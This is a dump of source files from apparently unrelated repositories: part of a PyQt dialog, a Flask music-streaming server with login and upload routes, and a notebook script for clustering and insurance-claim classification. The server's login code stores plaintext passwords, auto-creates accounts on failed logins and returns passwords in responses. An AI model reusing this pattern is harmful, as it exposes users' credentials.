QtWidgets.QFormLayout()\n self.formLayout.setObjectName(\"formLayout\")\n self.label_id = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_id.setFont(font)\n self.label_id.setObjectName(\"label_id\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_id)\n self.label_first_name = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_first_name.setFont(font)\n self.label_first_name.setObjectName(\"label_first_name\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_first_name)\n self.label_last_name = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_last_name.setFont(font)\n self.label_last_name.setObjectName(\"label_last_name\")\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_last_name)\n self.label_number = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_number.setFont(font)\n self.label_number.setObjectName(\"label_number\")\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_number)\n self.label_waiver = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_waiver.setFont(font)\n self.label_waiver.setObjectName(\"label_waiver\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_waiver)\n self.label_truck = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_truck.setFont(font)\n self.label_truck.setObjectName(\"label_truck\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_truck)\n self.edit_first_name = QtWidgets.QLineEdit(member_mod)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_first_name.sizePolicy().hasHeightForWidth())\n self.edit_first_name.setSizePolicy(sizePolicy)\n self.edit_first_name.setMinimumSize(QtCore.QSize(0, 0))\n self.edit_first_name.setMaximumSize(QtCore.QSize(110, 16777215))\n self.edit_first_name.setStyleSheet(\"*[hasAcceptableInput=\\\"false\\\"] { background-color: red }\")\n self.edit_first_name.setObjectName(\"edit_first_name\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.edit_first_name)\n self.edit_last_name = QtWidgets.QLineEdit(member_mod)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_last_name.sizePolicy().hasHeightForWidth())\n self.edit_last_name.setSizePolicy(sizePolicy)\n self.edit_last_name.setMinimumSize(QtCore.QSize(0, 0))\n self.edit_last_name.setMaximumSize(QtCore.QSize(110, 16777215))\n self.edit_last_name.setObjectName(\"edit_last_name\")\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.edit_last_name)\n self.edit_number = QtWidgets.QLineEdit(member_mod)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_number.sizePolicy().hasHeightForWidth())\n self.edit_number.setSizePolicy(sizePolicy)\n self.edit_number.setMinimumSize(QtCore.QSize(0, 0))\n self.edit_number.setMaximumSize(QtCore.QSize(110, 16777215))\n self.edit_number.setObjectName(\"edit_number\")\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.edit_number)\n self.check_waiver = QtWidgets.QCheckBox(member_mod)\n self.check_waiver.setText(\"\")\n self.check_waiver.setObjectName(\"check_waiver\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.check_waiver)\n self.check_truck = QtWidgets.QCheckBox(member_mod)\n self.check_truck.setText(\"\")\n self.check_truck.setObjectName(\"check_truck\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.check_truck)\n self.label_trailer = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_trailer.setFont(font)\n self.label_trailer.setObjectName(\"label_trailer\")\n self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_trailer)\n self.check_trailer = QtWidgets.QCheckBox(member_mod)\n self.check_trailer.setText(\"\")\n self.check_trailer.setObjectName(\"check_trailer\")\n self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.check_trailer)\n self.edit_id = QtWidgets.QLineEdit(member_mod)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_id.sizePolicy().hasHeightForWidth())\n self.edit_id.setSizePolicy(sizePolicy)\n self.edit_id.setMinimumSize(QtCore.QSize(0, 0))\n self.edit_id.setMaximumSize(QtCore.QSize(25, 16777215))\n self.edit_id.setStyleSheet(\"\")\n self.edit_id.setText(\"\")\n self.edit_id.setAlignment(QtCore.Qt.AlignCenter)\n self.edit_id.setObjectName(\"edit_id\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.edit_id)\n self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)\n self.buttonBox = QtWidgets.QDialogButtonBox(member_mod)\n self.buttonBox.setOrientation(QtCore.Qt.Horizontal)\n self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Save)\n self.buttonBox.setObjectName(\"buttonBox\")\n self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)\n\n self.retranslateUi(member_mod)\n QtCore.QMetaObject.connectSlotsByName(member_mod)\n member_mod.setTabOrder(self.edit_id, self.edit_first_name)\n member_mod.setTabOrder(self.edit_first_name, self.edit_last_name)\n member_mod.setTabOrder(self.edit_last_name, self.edit_number)\n member_mod.setTabOrder(self.edit_number, self.check_waiver)\n member_mod.setTabOrder(self.check_waiver, self.check_truck)\n member_mod.setTabOrder(self.check_truck, self.check_trailer)\n\n def retranslateUi(self, member_mod):\n _translate = QtCore.QCoreApplication.translate\n member_mod.setWindowTitle(_translate(\"member_mod\", \"Dialog\"))\n self.label_id.setText(_translate(\"member_mod\", \"Member ID\"))\n self.label_first_name.setText(_translate(\"member_mod\", \"First Name\"))\n self.label_last_name.setText(_translate(\"member_mod\", \"Last Name\"))\n self.label_number.setText(_translate(\"member_mod\", \"Call #\"))\n self.label_waiver.setText(_translate(\"member_mod\", \"Waiver Signed\"))\n self.label_truck.setText(_translate(\"member_mod\", \"Truck Cert\"))\n self.label_trailer.setText(_translate(\"member_mod\", \"Trailer Cert\"))\n\n" } ]
4
SoundOutOrganization/Server
https://github.com/SoundOutOrganization/Server
acdfabbdd01de378a41c52343812666678a9a6e8
66b41e8318e288841d0c049602beac6fcc287ec7
262e5b4fc36a4f6eeaa3ec9b58efd53b0dd40d71
refs/heads/master
2023-01-23T11:34:24.233130
2020-12-11T11:27:06
2020-12-11T11:27:06
317,255,922
1
2
null
null
null
null
null
[ { "alpha_fraction": 0.6366071701049805, "alphanum_fraction": 0.6366071701049805, "avg_line_length": 45.70833206176758, "blob_id": "fcc24333cfa5fd5aecfa7877de46164eccdbe0d8", "content_id": "bd219fb71c7d6cf1f41bba6b337882e0cefdcdf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1120, "license_type": "no_license", "max_line_length": 77, "num_lines": 24, "path": "/auth.py", "repo_name": "SoundOutOrganization/Server", "src_encoding": "UTF-8", "text": "from flask import render_template, redirect, url_for, request, flash, jsonify\nfrom flask_login import login_user, logout_user, login_required\nfrom init import Users\n#from werkzeug.security import generate_password_hash, check_password_hash\n\ndef login_gest(username, password, db):\n test_user = Users.query.filter_by(user=username).first()\n print (\"tesdzdzdzdzdzdzdzdzdzdzdzdzdzdzdzdzdzdzdz\")\n if(test_user != None):\n print(test_user.user,\"-> [USER EXIST]\", flush=True)\n if(test_user.passw != password):\n print(password,\"-> [INCORRECT PASSWORD]\", flush=True)\n return(\"FAILURE\")\n elif(test_user.passw == password):\n print(\"[CONNECTION OK]\", flush=True)\n value = {'username': test_user.user, 'password': test_user.passw}\n return (jsonify(value))\n elif(test_user == None):\n new_user = Users(user=username, passw=password)\n db.session.add(new_user)\n db.session.commit()\n print(new_user.user,\"-> [USER CREATED]\\n[CONNECTION OK]\", flush=True)\n value = {'username': new_user.user, 'password': new_user.passw}\n return (jsonify(value))" }, { "alpha_fraction": 0.5989702343940735, "alphanum_fraction": 0.6135583519935608, "avg_line_length": 30.790908813476562, "blob_id": "e6a9ecf46c5859e14834a7b6145153706b1712e1", "content_id": "0853269c481779d7304dc6f52f6348e04f8e884c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3496, "license_type": "no_license", "max_line_length": 139, "num_lines": 110, "path": "/app.py", "repo_name": "SoundOutOrganization/Server", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template, Response, jsonify, redirect\nimport sys\nimport flask\nfrom init import *\nfrom auth import *\nfrom debug import init_logs_formatting\nfrom werkzeug.utils import secure_filename\nfrom werkzeug.datastructures import FileStorage\nimport logging\nimport json\nimport os\ninit_logs_formatting()\napp, db= create_app()\napp.config['UPLOAD_PATH'] = 'music'\n#app.config['MAX_CONTENT_PATH']\napp.config['UPLOAD_EXTENSIONS'] = ['.mp3', '.wav'] #if file_ext not in current_app.config['UPLOAD_EXTENSIONS']:abort(400)\n\n#add music to db\[email protected]('/addmusic')\ndef template_addmusic():\n return render_template('addmusic.html')\n\[email protected]('/addmusic', methods=['POST'])\ndef test_music_db():\n genre = request.form.get('genre')\n title = request.form.get('title')\n author = request.form.get('author')\n uploaded_file = request.files['file']\n filename = secure_filename(uploaded_file.filename)\n if filename != '':\n file_ext = os.path.splitext(filename)[1]\n file_name = os.path.splitext(filename)[0]\n if file_ext not in app.config['UPLOAD_EXTENSIONS']:\n print(\"test\")\n else:\n new_single = Musics(genre=genre, title=title, author=author, link=\"music/\"+ file_name + file_ext)\n db.session.add(new_single)\n db.session.commit()\n uploaded_file.save(os.path.join(app.config['UPLOAD_PATH'], filename))\n\n return redirect(\"http://localhost:5000/addmusic\", code=302)\n\ndef get_musics_dict():\n x = 1\n value = []\n while(x <= Musics.query.count()):\n new_single = Musics.query.get(x)\n print (x)\n value.append({'id': x, 'genre': new_single.genre, 'title': new_single.title, 'author': new_single.author, 'link': new_single.link})\n x +=1\n return (value)\n\n#Route to render GUI\n\[email protected]('/musics')\ndef get_musics_route():\n x = 1\n value = []\n while(x <= Musics.query.count()):\n new_single = Musics.query.get(x)\n print (x)\n value.append({'id': x, 'genre': new_single.genre, 'title': new_single.title, 'author': new_single.author, 'link': new_single.link})\n x +=1\n return (jsonify(value))\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\[email protected]('/login', methods=['POST'])\ndef handle_login_data():\n username = request.form.get('username')\n password = request.form.get('password')\n x = login_gest(username, password, db)\n #print(x)\n if x == \"FAILURE\":\n return render_template('login.html')\n else :\n return redirect(\"http://localhost:5000/addmusic\", code=302)\n\n#Route to stream music\[email protected]('/play/<int:stream_id>')\ndef streammp3(stream_id):\n def generate():\n data = get_musics_dict()\n count = 1\n for item in data:\n print(item['id'])\n if item['id'] == stream_id:\n song = item['link']\n with open(song, \"rb\") as fwav:\n data = fwav.read(1024)\n while data:\n yield data\n data = fwav.read(1024)\n logging.debug('Music data fragment : ' + str(count))\n count += 1\n\n return Response(generate(), mimetype=\"audio/mp3\")\n\[email protected]('/')\ndef main_route():\n return redirect(\"http://localhost:5000/login\", code=302)\n\n#launch a Tornado server with HTTPServer.\nif __name__ == \"__main__\":\n port = 5000\n db.create_all() \n logging.debug(\"Started Server on port : \" + str(port))\n app.run(host='0.0.0.0')" }, { "alpha_fraction": 0.8666666746139526, "alphanum_fraction": 0.8666666746139526, "avg_line_length": 9, "blob_id": "363071143a404f5f7af4b4dfbf2ad63757ea1cc3", "content_id": "e4dd52d70f75186c12e5a38c17f6501e17e0d02f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 90, "license_type": "no_license", "max_line_length": 16, "num_lines": 9, "path": "/requirements.txt", "repo_name": "SoundOutOrganization/Server", "src_encoding": "UTF-8", "text": "Flask\nflask_login\ntornado\nflask_sqlalchemy\npyopenssl\nWerkzeug\nrequests\njsonify\nflask-cors\n" }, { "alpha_fraction": 0.6559378504753113, "alphanum_fraction": 0.677025556564331, "avg_line_length": 25.5, "blob_id": "c3c8f73901e55c99ace0aefd4e592015c4196b9d", "content_id": "70399f248bf98b8484a389aaaec404a59a35ae2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 901, "license_type": "no_license", "max_line_length": 68, "num_lines": 34, "path": "/init.py", "repo_name": "SoundOutOrganization/Server", "src_encoding": "UTF-8", "text": "import flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\n\n# Initialize Flask.\napp = flask.Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///./server.sqlite3'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\nCORS(app)\ndb = SQLAlchemy(app)\n\nclass Musics(db.Model):\n id = db.Column('id', db.Integer, primary_key = True)\n genre = db.Column(db.String(100))\n title = db.Column(db.String(100))\n author = db.Column(db.String(100))\n link = db.Column(db.String(100))\n\nclass Users(db.Model):\n id = db.Column('id', db.Integer, primary_key = True)\n user = db.Column(db.String(100))\n passw = db.Column(db.String(100))\n\ndef __init__(self, user, passw, genre, title, author, link):\n self.user = user\n self.passw = passw\n\n self.genre = genre\n self.title = title\n self.author = author\n self.link = link\n\ndef create_app():\n return(app, db)\n" } ]
4
hedayush97/Classification
https://github.com/hedayush97/Classification
40f444a86d84961e5bfb493c7024a02eadf204b7
a1654bc8d6fc475379b6964cde67bfcfe26fd596
c4466bc5a9fbbbb87a1345c4ce414268f016578c
refs/heads/main
2023-05-01T19:43:54.363418
2021-05-22T14:26:17
2021-05-22T14:26:17
369,826,785
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6222524642944336, "alphanum_fraction": 0.6499606370925903, "avg_line_length": 14.693258285522461, "blob_id": "ef54715a940bd58e3f0033c54f44d0ce6988a49d", "content_id": "4d8317c24a9163c381ed1523735eb0ce677cdd6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13967, "license_type": "no_license", "max_line_length": 342, "num_lines": 890, "path": "/AyushHeda_10-04-2021.py", "repo_name": "hedayush97/Classification", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Problem 1 Clustering\n# ## A leading bank wants to develop a customer segmentation to give promotional offers to its customers. They collected a sample that summarizes the activities of users during the past few months. You are given the task to identify the segments based on credit card usage.\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.preprocessing import StandardScaler\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom scipy.cluster.hierarchy import dendrogram, linkage\nfrom scipy.cluster.hierarchy import fcluster\n\nfrom sklearn.cluster import KMeans \n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neural_network import MLPClassifier\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report,confusion_matrix\n\n\n# In[2]:\n\n\ndf = pd.read_csv(\"bank_marketing_part1_Data.csv\")\n\n\n# In[3]:\n\n\ndf.head()\n\n\n# In[4]:\n\n\ndf.info()\n\n\n# In[5]:\n\n\ndf.isnull().sum()\n\n\n# # Checking Summary Statistics\n\n# In[6]:\n\n\ndf.describe()\n\n\n# # Checking for duplicates in the data\n\n# In[7]:\n\n\ndf.duplicated().sum()\n\n\n# #### There are no duplicates in the dataset\n\n# In[8]:\n\n\ndf.head()\n\n\n# # Ques 1\n\n# ### Univariate, bivariate and multivariate analysis\n\n# In[9]:\n\n\nplt.figure(figsize = (20,10))\nsns.boxplot(data = df)\nplt.show()\n\n\n# In[10]:\n\n\nsns.pairplot(df)\nplt.show()\n\n\n# In[11]:\n\n\nplt.figure(figsize=(10, 8))\ncorr = df.corr()\nsns.heatmap(corr, annot = True)\nplt.show()\n\n\n# In[12]:\n\n\ndef univariateAnalysis_numeric(column,nbins):\n print(\"Description of \" + column)\n print(\"----------------------------------------------------------------------------\")\n print(df[column].describe(),end=' ')\n \n \n plt.figure()\n print(\"Distribution of \" + column)\n print(\"----------------------------------------------------------------------------\")\n sns.distplot(df[column], kde=True, color = 'g');\n plt.show()\n \n plt.figure()\n print(\"BoxPlot of \" + column)\n print(\"----------------------------------------------------------------------------\")\n sns.boxplot(x = df[column])\n plt.show()\n\n\n# In[13]:\n\n\ndf_num = df.select_dtypes(include = ['float64', 'int64'])\nlstnumericcolumns = list(df_num.columns.values)\nlen(lstnumericcolumns)\n\n\n# In[14]:\n\n\nfor x in lstnumericcolumns:\n univariateAnalysis_numeric(x,20)\n\n\n# # Scaling the Data\n\n# In[15]:\n\n\nX = StandardScaler()\nscaled_df = pd.DataFrame(X.fit_transform(df.iloc[:,1:7]), columns = df.columns[1:])\n\n\n# In[16]:\n\n\nscaled_df.head()\n\n\n# In[17]:\n\n\nwardlink = linkage(scaled_df, method = 'ward')\n\n\n# In[18]:\n\n\nplt.figure(figsize=(10, 5))\ndend = dendrogram(wardlink)\nplt.show()\n\n\n# In[19]:\n\n\ndend = dendrogram(wardlink,\n truncate_mode = 'lastp',\n p = 8,\n )\n\n\n# In[20]:\n\n\nclusters = fcluster(wardlink, 3, criterion='maxclust')\nclusters\n\n\n# In[21]:\n\n\ndf['clusters'] = clusters\n\n\n# In[22]:\n\n\ndf.clusters.value_counts().sort_index()\n\n\n# # Cluster Profiling\n\n# In[23]:\n\n\naggdata=df.iloc[:,1:8].groupby('clusters').mean()\naggdata['Freq']=df.clusters.value_counts().sort_index()\naggdata\n\n\n# In[24]:\n\n\ndf.head()\n\n\n# # K - Means\n# ## Creating Clusters using KMeans\n\n# In[25]:\n\n\nk_means = KMeans(n_clusters = 3,random_state = 0)\n\n\n# In[26]:\n\n\nk_means.fit(scaled_df)\n\n\n# # Cluster Output for all the observations\n\n# In[27]:\n\n\nk_means.labels_\n\n\n# In[28]:\n\n\nk_means.inertia_\n\n\n# # Calculating WSS for other values of K - Elbow Method\n\n# In[29]:\n\n\nwss = []\n\n\n# In[30]:\n\n\nfor i in range(1,11):\n KM = KMeans(n_clusters = i, random_state = 1)\n KM.fit(scaled_df)\n wss.append(KM.inertia_)\n\n\n# In[31]:\n\n\nwss\n\n\n# In[32]:\n\n\na=[1,2,3,4,5,6,7,8,9,10]\n\n\n# In[33]:\n\n\nsns.pointplot(a, wss)\nplt.show()\n\n\n# # KMeans with K=2\n\n# In[34]:\n\n\nk_means = KMeans(n_clusters = 2,random_state=0)\nk_means.fit(scaled_df)\nlabels = k_means.labels_\n\n\n# # Cluster evaluation for 2 clusters: the silhouette score\n\n# In[35]:\n\n\nfrom sklearn.metrics import silhouette_samples, silhouette_score\n\n\n# In[36]:\n\n\nsilhouette_score(scaled_df,labels,random_state=0)\n\n\n# In[37]:\n\n\ndf[\"Clus_kmeans4\"] = labels\ndf.head()\n\n\n# # Cluster Profiling\n\n# In[38]:\n\n\ndf.Clus_kmeans4.value_counts().sort_index()\n\n\n# In[39]:\n\n\nclust_profile = df.groupby('Clus_kmeans4').mean()\nclust_profile['freq'] = df.Clus_kmeans4.value_counts().sort_index()\nclust_profile.T\n\n\n# # Problem 2 CART-RF-ANN\n# ## An Insurance firm providing tour insurance is facing higher claim frequency. The management decides to collect data from the past few years. You are assigned the task to make a model which predicts the claim status and provide recommendations to management. Use CART, RF & ANN and compare the models' performances in train and test sets.\n\n# # CART\n\n# In[40]:\n\n\ndataset = pd.read_csv(\"insurance_part2_data.csv\")\n\n\n# In[41]:\n\n\ndataset.head()\n\n\n# In[42]:\n\n\ndataset.describe()\n\n\n# In[43]:\n\n\ndataset.shape\n\n\n# In[44]:\n\n\ndataset.info()\n\n\n# In[45]:\n\n\ndataset.isnull().sum()\n\n\n# In[46]:\n\n\nplt.figure(figsize = (20,8))\nsns.boxplot(data = dataset)\nplt.show()\n\n\n# In[47]:\n\n\ndef univariateAnalysis_numeric(column,nbins):\n print(\"Description of \" + column)\n print(\"----------------------------------------------------------------------------\")\n print(dataset[column].describe(),end=' ')\n \n \n plt.figure()\n print(\"Distribution of \" + column)\n print(\"----------------------------------------------------------------------------\")\n sns.distplot(dataset[column], kde=True, color = 'g');\n plt.show()\n \n plt.figure()\n \n print(\"BoxPlot of \" + column)\n print(\"----------------------------------------------------------------------------\")\n sns.boxplot(x = dataset[column])\n plt.show()\n\n\n# In[48]:\n\n\ndataset_num = dataset.select_dtypes(include = ['float64', 'int64'])\nlstnumericcolumns = list(dataset_num.columns.values)\nlen(lstnumericcolumns)\n\n\n# In[49]:\n\n\nfor x in lstnumericcolumns:\n univariateAnalysis_numeric(x,10)\n\n\n# In[50]:\n\n\nsns.pairplot(dataset)\nplt.show()\n\n\n# In[51]:\n\n\nplt.figure(figsize=(10, 8))\ncorr = dataset.corr()\nsns.heatmap(corr, annot = True)\nplt.show()\n\n\n# In[52]:\n\n\nfor feature in dataset.columns: \n if dataset[feature].dtype == 'object': \n dataset[feature] = pd.Categorical(dataset[feature]).codes\n\n\n# In[53]:\n\n\nX = dataset.drop(\"Claimed\", axis=1)\ny = dataset.pop(\"Claimed\")\n\n\n# In[54]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, train_labels, test_labels = train_test_split(X, y, test_size=0.20, random_state = 0)\n\n\n# In[55]:\n\n\ndt_model = DecisionTreeClassifier(criterion = 'gini', random_state = 0)\n\n\n# In[56]:\n\n\ndt_model.fit(X_train, train_labels)\n\n\n# In[57]:\n\n\nfrom sklearn import tree\n\ntrain_char_label = ['No', 'Yes']\nTree_File = open('dataset_tree.dot','w')\ndot_data = tree.export_graphviz(dt_model, out_file=Tree_File, feature_names = list(X_train), class_names = list(train_char_label))\n\nTree_File.close()\n\n\n# In[58]:\n\n\nprint (pd.DataFrame(dt_model.feature_importances_, columns = [\"Imp\"], index = X_train.columns))\n\n\n# In[59]:\n\n\ny_predict = dt_model.predict(X_test)\n\n\n# # Regularizing the Decision Tree\n\n# In[60]:\n\n\nreg_dt_model = DecisionTreeClassifier(criterion = 'gini', max_depth = 7,min_samples_leaf=10,min_samples_split=30)\nreg_dt_model.fit(X_train, train_labels)\n\n\n# In[61]:\n\n\ntree_regularized = open('tree_regularized.dot','w')\ndot_data = tree.export_graphviz(reg_dt_model, out_file= tree_regularized , feature_names = list(X_train), class_names = list(train_char_label))\n\ntree_regularized.close()\n\nprint (pd.DataFrame(dt_model.feature_importances_, columns = [\"Imp\"], index = X_train.columns))\n\n\n# In[62]:\n\n\nytrain_predict = reg_dt_model.predict(X_train)\nytest_predict = reg_dt_model.predict(X_test)\n\n\n# In[63]:\n\n\n# AUC and ROC for the training data\n\n# predict probabilities\nprobs = reg_dt_model.predict_proba(X_train)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(train_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(train_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# In[64]:\n\n\n# AUC and ROC for the test data\n\n\n# predict probabilities\nprobs = reg_dt_model.predict_proba(X_test)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(test_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(test_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# In[65]:\n\n\nprint(classification_report(train_labels, ytrain_predict))\n\n\n# In[66]:\n\n\nconfusion_matrix(train_labels, ytrain_predict)\n\n\n# In[67]:\n\n\nreg_dt_model.score(X_train,train_labels)\n\n\n# In[68]:\n\n\nprint(classification_report(test_labels, ytest_predict))\n\n\n# In[69]:\n\n\nconfusion_matrix(test_labels, ytest_predict)\n\n\n# In[70]:\n\n\nreg_dt_model.score(X_test,test_labels)\n\n\n# # Random Forest\n\n# In[71]:\n\n\nrfcl = RandomForestClassifier(n_estimators = 501)\nrfcl = rfcl.fit(X_train, train_labels)\n\n\n# In[72]:\n\n\nfrom sklearn.model_selection import GridSearchCV\n\nparam_grid = {\n 'max_depth': [7, 8, 9, 10],\n 'min_samples_leaf': [15, 20, 25],\n 'min_samples_split': [45, 60, 75],\n 'n_estimators': [100, 300, 700] \n}\n\nrfcl = RandomForestClassifier()\n\ngrid_search = GridSearchCV(estimator = rfcl, param_grid = param_grid, cv = 3)\n\n\n# In[73]:\n\n\ngrid_search.fit(X_train, train_labels)\n\n\n# In[74]:\n\n\ngrid_search.best_params_\n\n\n# In[75]:\n\n\nbest_grid = grid_search.best_estimator_\n\n\n# In[76]:\n\n\nytrain_predict = best_grid.predict(X_train)\nytest_predict = best_grid.predict(X_test)\n\n\n# In[77]:\n\n\ngrid_search.score(X_train,train_labels)\n\n\n# In[78]:\n\n\nconfusion_matrix(train_labels,ytrain_predict)\n\n\n# In[79]:\n\n\nprint(classification_report(train_labels,ytrain_predict))\n\n\n# In[80]:\n\n\nprint(classification_report(test_labels,ytest_predict))\n\n\n# In[81]:\n\n\nconfusion_matrix(test_labels,ytest_predict)\n\n\n# In[82]:\n\n\ngrid_search.score(X_test, test_labels)\n\n\n# In[83]:\n\n\n# AUC and ROC for the training data\n\n# predict probabilities\nprobs = best_grid.predict_proba(X_train)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(train_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(train_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# In[84]:\n\n\n# AUC and ROC for the test data\n\n\n# predict probabilities\nprobs = best_grid.predict_proba(X_test)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(test_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(test_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# # ANN\n\n# In[85]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 1)\n\n\n# In[86]:\n\n\nsc = StandardScaler() \nX_trains = sc.fit_transform(X_train) \nX_tests = sc.transform (X_test)\n\n\n# In[87]:\n\n\nclf = MLPClassifier(hidden_layer_sizes = 100, max_iter = 5000,\n solver='lbfgs', verbose = True, random_state = 0, tol = 0.01)\nclf.fit(X_train, y_train)\n\n\n# In[88]:\n\n\ny_pred = clf.predict(X_test)\n\n\n# In[89]:\n\n\naccuracy_score(test_labels, y_pred) * 100\n\n\n# In[90]:\n\n\nparam_grid = {\n 'hidden_layer_sizes': [(100,200,300)],\n 'activation': ['logistic', 'relu'],\n 'solver': ['sgd', 'adam'],\n 'tol': [0.1,0.001,0.0001],\n 'max_iter' : [10000]\n}\n\nrfcl = MLPClassifier()\n\ngrid_search = GridSearchCV(estimator = rfcl, param_grid = param_grid, cv = 3)\n\n\n# In[91]:\n\n\ngrid_search.fit(X_trains, train_labels)\n\n\n# In[92]:\n\n\ngrid_search.best_params_\n\n\n# In[93]:\n\n\nbest_grid = grid_search.best_estimator_\n\n\n# In[94]:\n\n\nytrain_predict = best_grid.predict(X_trains)\nytest_predict = best_grid.predict(X_tests)\n\n\n# In[95]:\n\n\nconfusion_matrix(train_labels,ytrain_predict)\n\n\n# In[96]:\n\n\nprint(classification_report(train_labels,ytrain_predict))\n\n\n# In[97]:\n\n\n# AUC and ROC for the training data\n\n# predict probabilities\nprobs = best_grid.predict_proba(X_train)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(train_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(train_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# In[98]:\n\n\naccuracy_score(test_labels, ytest_predict) * 100\n\n\n# In[99]:\n\n\nconfusion_matrix(test_labels,ytest_predict)\n\n\n# 